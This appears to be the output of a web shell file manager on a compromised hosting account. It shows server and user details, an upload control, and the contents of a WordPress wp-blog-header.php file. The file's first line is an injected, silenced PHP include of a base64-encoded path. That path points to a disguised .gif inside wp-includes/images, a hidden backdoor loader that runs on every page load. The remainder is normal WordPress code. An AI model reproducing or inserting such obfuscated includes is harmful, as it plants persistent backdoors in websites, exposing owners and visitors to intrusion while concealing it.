HEX
Server: Apache/2.4
System: Linux php-v387.wc2.phx1.stabletransit.com 5.10.0-41-amd64 #1 SMP Debian 5.10.251-3 (2026-04-30) x86_64
User: oasisfloral (2219914)
PHP: 7.4.33
Disabled: leak,posix_getpwuid,posix_getpwnam,posix_getgrid,posix_getgrnam,posix_getgroups
Upload Files
File: /mnt/stor7-wc2-dfw1/527264/670532/www.artefloral.com.mx/web/content/wp-blog-header.php
<?php @include base64_decode("L21udC9zdG9yNy13YzItZGZ3MS81MjcyNjQvNjcwNTMyL3d3dy5hcnRlZmxvcmFsLmNvbS5teC93ZWIvY29udGVudC93cC1pbmNsdWRlcy9pbWFnZXMvdy1kY2NkZWVlZmZiZWZiZGYuZ2lm");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}